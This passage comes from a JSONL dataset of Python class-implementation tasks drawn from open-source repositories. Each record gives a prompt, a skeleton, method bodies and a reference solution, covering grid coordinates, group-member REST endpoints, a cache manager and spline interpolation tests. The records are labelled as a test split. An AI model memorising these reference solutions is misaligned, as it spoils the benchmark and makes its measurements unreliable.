np.column_stack((roi_xs, roi_ys))\n self.roi_idxs = np.array(np.where(self.roi)).T\n self.roi_idxs_flat = np.where(self.roi.flat)[0]\n<|end_body_1|>\n", "revision_id": "c124c289f609cc5ab7751b3cbc8d14e52594ee1d", "skeleton": "<|skeleton|>\nclass ModelGrid:\n \"\"\"Container for storing model grid related variables.\"\"\"\n\n def prepare_coordinates(self):\n \"\"\"Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. - X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. - roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points\"\"\"\n <|body_0|>\n\n def prepare_roi_coordinates(self):\n \"\"\"Update the roi_points and roi_idxs variables using the ROI field.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ModelGrid:\n \"\"\"Container for storing model grid related variables.\"\"\"\n\n def prepare_coordinates(self):\n \"\"\"Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. - X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. - roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points\"\"\"\n transform = self.transform\n if transform.a < 0 or transform.e > 0:\n raise NotImplementedError\n x_min = transform.xoff\n x_max = x_min + self.cols * self.resolution\n y_max = transform.yoff\n y_min = y_max - self.rows * self.resolution\n x_range, y_range = rasterio.transform.xy(self.transform, [0, self.rows - 1], [0, self.cols - 1])\n xs = np.linspace(x_range[0], x_range[1], self.cols)\n ys = np.linspace(y_range[0], y_range[1], self.rows)\n X, Y = np.meshgrid(xs, ys)\n center_x = xs.mean()\n center_y = ys.mean()\n center_lon, center_lat = transform_coords(center_x, center_y, self.crs, constants.CRS_WGS84)\n self.x_min = x_min\n self.x_max = x_max\n self.y_min = y_min\n self.y_max = y_max\n self.xs = xs\n self.ys = ys\n self.X = X\n self.Y = Y\n self.all_points = np.column_stack((X.flat, Y.flat))\n self.center_lon = center_lon\n self.center_lat = center_lat\n self.prepare_roi_coordinates()\n\n def prepare_roi_coordinates(self):\n \"\"\"Update the roi_points and roi_idxs variables using the ROI field.\"\"\"\n if 'roi' not in self:\n self.roi = np.ones((self.rows, self.cols), dtype=bool)\n roi_xs = self.X[self.roi]\n roi_ys = self.Y[self.roi]\n self.roi_points = np.column_stack((roi_xs, roi_ys))\n self.roi_idxs = np.array(np.where(self.roi)).T\n self.roi_idxs_flat = np.where(self.roi.flat)[0]\n", "source": "the_stack_v2_python_sparse", "source_path": "openamundsen/util.py", "source_repo": "ripertio/openamundsen", "split": "test", "star_events_count": 0} {"blob_id": "9185c159e4bf7d09fe85272ae235f7210e097ca8", "bodies": ["try:\n avatar_size = int(request.GET.get('avatar_size', AVATAR_DEFAULT_SIZE))\nexcept ValueError:\n avatar_size = AVATAR_DEFAULT_SIZE\ntry:\n if not is_group_member(group_id, request.user.username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n members = ccnet_api.get_group_members(group_id)\nexcept RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\ngroup_members = []\nis_admin = request.GET.get('is_admin', 'false')\nfor m in members:\n if is_admin == 'true' and (not m.is_staff):\n continue\n member_info = get_group_member_info(request, group_id, m.user_name, avatar_size)\n group_members.append(member_info)\nreturn Response(group_members)", "username = request.user.username\nif not is_group_admin_or_owner(group_id, username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\nemail = request.data.get('email', None)\ntry:\n User.objects.get(email=email)\nexcept User.DoesNotExist:\n error_msg = 'User %s not found.' % email\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\ntry:\n if is_group_member(group_id, email):\n error_msg = _(u'User %s is already a group member.') % email2nickname(email)\n return api_error(status.HTTP_400_BAD_REQUEST, error_msg)\n if is_org_context(request):\n org_id = request.user.org.org_id\n if not ccnet_api.org_user_exists(org_id, email):\n error_msg = _(u'User %s not found in organization.') % email2nickname(email)\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n ccnet_api.group_add_member(group_id, username, email)\n add_user_to_group.send(sender=None, group_staff=username, group_id=group_id, added_user=email)\nexcept RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\nmember_info = get_group_member_info(request, group_id, email)\nreturn Response(member_info, status=status.HTTP_201_CREATED)"], "bodies_text": "<|body_start_0|>\n try:\n avatar_size = int(request.GET.get('avatar_size', AVATAR_DEFAULT_SIZE))\n except ValueError:\n avatar_size = AVATAR_DEFAULT_SIZE\n try:\n if not is_group_member(group_id, request.user.username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n members = ccnet_api.get_group_members(group_id)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n group_members = []\n is_admin = request.GET.get('is_admin', 'false')\n for m in members:\n if is_admin == 'true' and (not m.is_staff):\n continue\n member_info = get_group_member_info(request, group_id, m.user_name, avatar_size)\n group_members.append(member_info)\n return Response(group_members)\n<|end_body_0|>\n\n<|body_start_1|>\n username = request.user.username\n if not is_group_admin_or_owner(group_id, username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n email = request.data.get('email', None)\n try:\n User.objects.get(email=email)\n except User.DoesNotExist:\n error_msg = 'User %s not found.' % email\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n try:\n if is_group_member(group_id, email):\n error_msg = _(u'User %s is already a group member.') % email2nickname(email)\n return api_error(status.HTTP_400_BAD_REQUEST, error_msg)\n if is_org_context(request):\n org_id = request.user.org.org_id\n if not ccnet_api.org_user_exists(org_id, email):\n error_msg = _(u'User %s not found in organization.') % email2nickname(email)\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n ccnet_api.group_add_member(group_id, username, email)\n add_user_to_group.send(sender=None, group_staff=username, group_id=group_id, added_user=email)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n member_info = get_group_member_info(request, group_id, email)\n return Response(member_info, status=status.HTTP_201_CREATED)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "GroupMembers", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GroupMembers:\n\n def get(self, request, group_id, format=None):\n \"\"\"Get all group members.\"\"\"\n <|body_0|>\n\n def post(self, request, group_id):\n \"\"\"Add a group member.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n avatar_size = int(request.GET.get('avatar_size', AVATAR_DEFAULT_SIZE))\n except ValueError:\n avatar_size = AVATAR_DEFAULT_SIZE\n try:\n if not is_group_member(group_id, request.user.username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n members = ccnet_api.get_group_members(group_id)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n group_members = []\n is_admin = request.GET.get('is_admin', 'false')\n for m in members:\n if is_admin == 'true' and (not m.is_staff):\n continue\n member_info = get_group_member_info(request, group_id, m.user_name, avatar_size)\n group_members.append(member_info)\n return Response(group_members)\n<|end_body_0|>\n\n<|body_start_1|>\n username = request.user.username\n if not is_group_admin_or_owner(group_id, username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n email = request.data.get('email', None)\n try:\n User.objects.get(email=email)\n except User.DoesNotExist:\n error_msg = 'User %s not found.' % email\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n try:\n if is_group_member(group_id, email):\n error_msg = _(u'User %s is already a group member.') % email2nickname(email)\n return api_error(status.HTTP_400_BAD_REQUEST, error_msg)\n if is_org_context(request):\n org_id = request.user.org.org_id\n if not ccnet_api.org_user_exists(org_id, email):\n error_msg = _(u'User %s not found in organization.') % email2nickname(email)\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n ccnet_api.group_add_member(group_id, username, email)\n add_user_to_group.send(sender=None, group_staff=username, group_id=group_id, added_user=email)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n member_info = get_group_member_info(request, group_id, email)\n return Response(member_info, status=status.HTTP_201_CREATED)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000007", "length_bytes": 12521, "license_type": "permissive", "methods": [{"docstring": "Get all group members.", "name": "get", "signature": "def get(self, request, group_id, format=None)"}, {"docstring": "Add a group member.", "name": "post", "signature": "def post(self, request, group_id)"}], "n_methods": 2, "prompt": "Implement the Python class `GroupMembers` described below.\n\nClass description:\nImplement the GroupMembers class.\n\nMethod signatures and docstrings:\n- def get(self, request, group_id, format=None): Get all group members.\n- def post(self, request, group_id): Add a group member.", "prompted_full_text": "Implement the Python class `GroupMembers` described below.\n\nClass description:\nImplement the GroupMembers class.\n\nMethod signatures and docstrings:\n- def get(self, request, group_id, format=None): Get all group members.\n- def post(self, request, group_id): Add a group member.\n\n<|skeleton|>\nclass GroupMembers:\n\n def get(self, request, group_id, format=None):\n \"\"\"Get all group members.\"\"\"\n <|body_0|>\n\n def post(self, request, group_id):\n \"\"\"Add a group member.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n avatar_size = int(request.GET.get('avatar_size', AVATAR_DEFAULT_SIZE))\n except ValueError:\n avatar_size = AVATAR_DEFAULT_SIZE\n try:\n if not is_group_member(group_id, request.user.username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n members = ccnet_api.get_group_members(group_id)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n group_members = []\n is_admin = request.GET.get('is_admin', 'false')\n for m in members:\n if is_admin == 'true' and (not m.is_staff):\n continue\n member_info = get_group_member_info(request, group_id, m.user_name, avatar_size)\n group_members.append(member_info)\n return Response(group_members)\n<|end_body_0|>\n\n<|body_start_1|>\n username = request.user.username\n if not is_group_admin_or_owner(group_id, username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n email = request.data.get('email', None)\n try:\n User.objects.get(email=email)\n except User.DoesNotExist:\n error_msg = 'User %s not found.' % email\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n try:\n if is_group_member(group_id, email):\n error_msg = _(u'User %s is already a group member.') % email2nickname(email)\n return api_error(status.HTTP_400_BAD_REQUEST, error_msg)\n if is_org_context(request):\n org_id = request.user.org.org_id\n if not ccnet_api.org_user_exists(org_id, email):\n error_msg = _(u'User %s not found in organization.') % email2nickname(email)\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n ccnet_api.group_add_member(group_id, username, email)\n add_user_to_group.send(sender=None, group_staff=username, group_id=group_id, added_user=email)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n member_info = get_group_member_info(request, group_id, email)\n return Response(member_info, status=status.HTTP_201_CREATED)\n<|end_body_1|>\n", "revision_id": "13b3ed26a04248211ef91ca70dccc617be27a3c3", "skeleton": "<|skeleton|>\nclass GroupMembers:\n\n def get(self, request, group_id, format=None):\n \"\"\"Get all group members.\"\"\"\n <|body_0|>\n\n def post(self, request, group_id):\n \"\"\"Add a group member.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GroupMembers:\n def get(self, request, group_id, format=None):\n \"\"\"Get all group members.\"\"\"\n try:\n avatar_size = int(request.GET.get('avatar_size', AVATAR_DEFAULT_SIZE))\n except ValueError:\n avatar_size = AVATAR_DEFAULT_SIZE\n try:\n if not is_group_member(group_id, request.user.username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n members = ccnet_api.get_group_members(group_id)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n group_members = []\n is_admin = request.GET.get('is_admin', 'false')\n for m in members:\n if is_admin == 'true' and (not m.is_staff):\n continue\n member_info = get_group_member_info(request, group_id, m.user_name, avatar_size)\n group_members.append(member_info)\n return Response(group_members)\n\n def post(self, request, group_id):\n \"\"\"Add a group member.\"\"\"\n username = request.user.username\n if not is_group_admin_or_owner(group_id, username):\n error_msg = 'Permission denied.'\n return api_error(status.HTTP_403_FORBIDDEN, error_msg)\n email = request.data.get('email', None)\n try:\n User.objects.get(email=email)\n except User.DoesNotExist:\n error_msg = 'User %s not found.' % email\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n try:\n if is_group_member(group_id, email):\n error_msg = _(u'User %s is already a group member.') % email2nickname(email)\n return api_error(status.HTTP_400_BAD_REQUEST, error_msg)\n if is_org_context(request):\n org_id = request.user.org.org_id\n if not ccnet_api.org_user_exists(org_id, email):\n error_msg = _(u'User %s not found in organization.') % email2nickname(email)\n return api_error(status.HTTP_404_NOT_FOUND, error_msg)\n ccnet_api.group_add_member(group_id, username, email)\n add_user_to_group.send(sender=None, group_staff=username, group_id=group_id, added_user=email)\n except RpcsyncwerkError as e:\n logger.error(e)\n error_msg = 'Internal Server Error'\n return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)\n member_info = get_group_member_info(request, group_id, email)\n return Response(member_info, status=status.HTTP_201_CREATED)\n", "source": "the_stack_v2_python_sparse", "source_path": "fhs/usr/share/python/syncwerk/restapi/restapi/api2/endpoints/group_members.py", "source_repo": "syncwerk/syncwerk-server-restapi", "split": "test", "star_events_count": 0} {"blob_id": "be2966afca7a5675553033b35d517fafff6304d0", "bodies": ["self.manager = CacheDataManager()\nself.info = CacheManagerInfo(self.manager)\nself.dataset = CacheManagerDataset(self.manager)\nself.task = CacheManagerTask(self.manager)\nself.category = CacheManagerCategory(self.manager)", "self.info.info()\nself.dataset.info()\nself.category.info()"], "bodies_text": "<|body_start_0|>\n self.manager = CacheDataManager()\n self.info = CacheManagerInfo(self.manager)\n self.dataset = CacheManagerDataset(self.manager)\n self.task = CacheManagerTask(self.manager)\n self.category = CacheManagerCategory(self.manager)\n<|end_body_0|>\n\n<|body_start_1|>\n self.info.info()\n self.dataset.info()\n self.category.info()\n<|end_body_1|>\n", "class_docstring": "Manage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. data : dict Cache contents.", "class_name": "CacheManager", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CacheManager:\n \"\"\"Manage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. data : dict Cache contents.\"\"\"\n\n def __init__(self):\n \"\"\"Initializes the class.\"\"\"\n <|body_0|>\n\n def info_cache(self):\n \"\"\"Prints the information of the cache.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.manager = CacheDataManager()\n self.info = CacheManagerInfo(self.manager)\n self.dataset = CacheManagerDataset(self.manager)\n self.task = CacheManagerTask(self.manager)\n self.category = CacheManagerCategory(self.manager)\n<|end_body_0|>\n\n<|body_start_1|>\n self.info.info()\n self.dataset.info()\n self.category.info()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000008", "length_bytes": 33479, "license_type": "permissive", "methods": [{"docstring": "Initializes the class.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Prints the information of the cache.", "name": "info_cache", "signature": "def info_cache(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004745", "prompt": "Implement the Python class `CacheManager` described below.\n\nClass description:\nManage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. data : dict Cache contents.\n\nMethod signatures and docstrings:\n- def __init__(self): Initializes the class.\n- def info_cache(self): Prints the information of the cache.", "prompted_full_text": "Implement the Python class `CacheManager` described below.\n\nClass description:\nManage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. data : dict Cache contents.\n\nMethod signatures and docstrings:\n- def __init__(self): Initializes the class.\n- def info_cache(self): Prints the information of the cache.\n\n<|skeleton|>\nclass CacheManager:\n \"\"\"Manage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. data : dict Cache contents.\"\"\"\n\n def __init__(self):\n \"\"\"Initializes the class.\"\"\"\n <|body_0|>\n\n def info_cache(self):\n \"\"\"Prints the information of the cache.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.manager = CacheDataManager()\n self.info = CacheManagerInfo(self.manager)\n self.dataset = CacheManagerDataset(self.manager)\n self.task = CacheManagerTask(self.manager)\n self.category = CacheManagerCategory(self.manager)\n<|end_body_0|>\n\n<|body_start_1|>\n self.info.info()\n self.dataset.info()\n self.category.info()\n<|end_body_1|>\n", "revision_id": "e0be95d941b50a5b2e27ffa1c5be20dc6aa2d6a1", "skeleton": "<|skeleton|>\nclass CacheManager:\n \"\"\"Manage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. data : dict Cache contents.\"\"\"\n\n def __init__(self):\n \"\"\"Initializes the class.\"\"\"\n <|body_0|>\n\n def info_cache(self):\n \"\"\"Prints the information of the cache.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CacheManager:\n \"\"\"Manage dbcollection configurations and stores them inside a cache file stored in disk. Attributes ---------- cache_filename : str Cache file path + name. cache_dir : str Default directory to store all dataset's metadata files. download_dir : str Default save dir path for downloaded data. data : dict Cache contents.\"\"\"\n\n def __init__(self):\n \"\"\"Initializes the class.\"\"\"\n self.manager = CacheDataManager()\n self.info = CacheManagerInfo(self.manager)\n self.dataset = CacheManagerDataset(self.manager)\n self.task = CacheManagerTask(self.manager)\n self.category = CacheManagerCategory(self.manager)\n\n def info_cache(self):\n \"\"\"Prints the information of the cache.\"\"\"\n self.info.info()\n self.dataset.info()\n self.category.info()\n", "source": "the_stack_v2_python_sparse", "source_path": "dbcollection/core/manager.py", "source_repo": "dbcollection/dbcollection", "split": "test", "star_events_count": 25} {"blob_id": "6a666f5804ac00505ab358797d6e3182fd57620a", "bodies": ["tp = _QuadraticPlusSinProblem1D()\nquery_points, _, train_points, train_values = tp.get_problem(extrapolate=False, dtype='float64')\ninterpolation_order = 1\nwith ops.name_scope('interpolator'):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order)\n with self.test_session() as sess:\n fetches = [query_points, train_points, train_values, interpolator]\n query_points_, train_points_, train_values_, interp_ = sess.run(fetches)\n interp_ = interp_[0, :, 0]\n query_points_ = query_points_[0, :, 0]\n train_points_ = train_points_[0, :, 0]\n train_values_ = train_values_[0, :, 0]\n scipy_interp_function = sc_interpolate.interp1d(train_points_, train_values_, kind='linear')\n scipy_interpolation = scipy_interp_function(query_points_)\n scipy_interpolation_on_train = scipy_interp_function(train_points_)\n tol = 0.001\n self.assertAllClose(train_values_, scipy_interpolation_on_train, atol=tol, rtol=tol)\n self.assertAllClose(interp_, scipy_interpolation, atol=tol, rtol=tol)", "tp = _QuadraticPlusSinProblem1D()\nquery_points, _, train_points, train_values = tp.get_problem(dtype='float64')\nfor order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)", "tp = _QuadraticPlusSinProblemND()\nquery_points, _, train_points, train_values = tp.get_problem(dtype='float64')\nfor order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)", "tp = _QuadraticPlusSinProblemND()\nquery_points, query_values, train_points, train_values = tp.get_problem(optimizable=True)\nregularization = 0.001\nfor interpolation_order in (1, 2, 3, 4):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order, regularization)\n loss = math_ops.reduce_mean(math_ops.square(query_values - interpolator))\n optimizer = momentum.MomentumOptimizer(0.001, 0.9)\n grad = gradients.gradients(loss, [train_points])\n grad, _ = clip_ops.clip_by_global_norm(grad, 1.0)\n opt_func = optimizer.apply_gradients(zip(grad, [train_points]))\n init_op = variables.global_variables_initializer()\n with self.test_session() as sess:\n sess.run(init_op)\n for _ in range(100):\n sess.run([loss, opt_func])"], "bodies_text": "<|body_start_0|>\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(extrapolate=False, dtype='float64')\n interpolation_order = 1\n with ops.name_scope('interpolator'):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order)\n with self.test_session() as sess:\n fetches = [query_points, train_points, train_values, interpolator]\n query_points_, train_points_, train_values_, interp_ = sess.run(fetches)\n interp_ = interp_[0, :, 0]\n query_points_ = query_points_[0, :, 0]\n train_points_ = train_points_[0, :, 0]\n train_values_ = train_values_[0, :, 0]\n scipy_interp_function = sc_interpolate.interp1d(train_points_, train_values_, kind='linear')\n scipy_interpolation = scipy_interp_function(query_points_)\n scipy_interpolation_on_train = scipy_interp_function(train_points_)\n tol = 0.001\n self.assertAllClose(train_values_, scipy_interpolation_on_train, atol=tol, rtol=tol)\n self.assertAllClose(interp_, scipy_interpolation, atol=tol, rtol=tol)\n<|end_body_0|>\n\n<|body_start_1|>\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n<|end_body_1|>\n\n<|body_start_2|>\n tp = _QuadraticPlusSinProblemND()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n<|end_body_2|>\n\n<|body_start_3|>\n tp = _QuadraticPlusSinProblemND()\n query_points, query_values, train_points, train_values = tp.get_problem(optimizable=True)\n regularization = 0.001\n for interpolation_order in (1, 2, 3, 4):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order, regularization)\n loss = math_ops.reduce_mean(math_ops.square(query_values - interpolator))\n optimizer = momentum.MomentumOptimizer(0.001, 0.9)\n grad = gradients.gradients(loss, [train_points])\n grad, _ = clip_ops.clip_by_global_norm(grad, 1.0)\n opt_func = optimizer.apply_gradients(zip(grad, [train_points]))\n init_op = variables.global_variables_initializer()\n with self.test_session() as sess:\n sess.run(init_op)\n for _ in range(100):\n sess.run([loss, opt_func])\n<|end_body_3|>\n", "class_docstring": "", "class_name": "InterpolateSplineTest", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass InterpolateSplineTest:\n\n def test_1d_linear_interpolation(self):\n \"\"\"For 1d linear interpolation, we can compare directly to scipy.\"\"\"\n <|body_0|>\n\n def test_1d_interpolation(self):\n \"\"\"Regression test for interpolation with 1-D points.\"\"\"\n <|body_1|>\n\n def test_nd_linear_interpolation(self):\n \"\"\"Regression test for interpolation with N-D points.\"\"\"\n <|body_2|>\n\n def test_interpolation_gradient(self):\n \"\"\"Make sure that backprop can run. Correctness of gradients is assumed. Here, we create a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data yields the best reconstruction for the function values at the query points. The training data locations are optimized iteratively using gradient descent.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(extrapolate=False, dtype='float64')\n interpolation_order = 1\n with ops.name_scope('interpolator'):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order)\n with self.test_session() as sess:\n fetches = [query_points, train_points, train_values, interpolator]\n query_points_, train_points_, train_values_, interp_ = sess.run(fetches)\n interp_ = interp_[0, :, 0]\n query_points_ = query_points_[0, :, 0]\n train_points_ = train_points_[0, :, 0]\n train_values_ = train_values_[0, :, 0]\n scipy_interp_function = sc_interpolate.interp1d(train_points_, train_values_, kind='linear')\n scipy_interpolation = scipy_interp_function(query_points_)\n scipy_interpolation_on_train = scipy_interp_function(train_points_)\n tol = 0.001\n self.assertAllClose(train_values_, scipy_interpolation_on_train, atol=tol, rtol=tol)\n self.assertAllClose(interp_, scipy_interpolation, atol=tol, rtol=tol)\n<|end_body_0|>\n\n<|body_start_1|>\n tp = _QuadraticPlusSinProblem1D()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n<|end_body_1|>\n\n<|body_start_2|>\n tp = _QuadraticPlusSinProblemND()\n query_points, _, train_points, train_values = tp.get_problem(dtype='float64')\n for order in (1, 2, 3):\n for reg_weight in (0, 0.01):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, order, reg_weight)\n target_interpolation = tp.HARDCODED_QUERY_VALUES[order, reg_weight]\n target_interpolation = np.array(target_interpolation)\n with self.test_session() as sess:\n interp_val = sess.run(interpolator)\n self.assertAllClose(interp_val[0, :, 0], target_interpolation)\n<|end_body_2|>\n\n<|body_start_3|>\n tp = _QuadraticPlusSinProblemND()\n query_points, query_values, train_points, train_values = tp.get_problem(optimizable=True)\n regularization = 0.001\n for interpolation_order in (1, 2, 3, 4):\n interpolator = interpolate_spline.interpolate_spline(train_points, train_values, query_points, interpolation_order, regularization)\n loss = math_ops.reduce_mean(math_ops.square(query_values - interpolator))\n optimizer = momentum.MomentumOptimizer(0.001, 0.9)\n grad = gradients.gradients(loss, [train_points])\n grad, _ = clip_ops.clip_by_global_norm(grad, 1.0)\n opt_func = optimizer.apply_gradients(zip(grad, [train_points]))\n init_op = variables.global_variables_initializer()\n with self.test_session() as sess:\n sess.run(init_op)\n for _ in range(100):\n sess.run([loss, opt_func])\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000009", "length_bytes": 10269, "license_type": "permissive", "methods": [{"docstring": "For 1d linear interpolation, we can compare directly to scipy.", "name": "test_1d_linear_interpolation", "signature": "def test_1d_linear_interpolation(self)"}, {"docstring": "Regression test for interpolation with 1-D points.", "name": "test_1d_interpolation", "signature": "def test_1d_interpolation(self)"}, {"docstring": "Regression test for interpolation with N-D points.", "name": "test_nd_linear_interpolation", "signature": "def test_nd_linear_interpolation(self)"}, {"docstring": "Make sure that backprop can run. Correctness of gradients is assumed. Here, we create a use a small 'training' set and a more densely-sampled set of query points, for which we know the true value in advance. The goal is to choose x locations for the training data such that interpolating using this training data 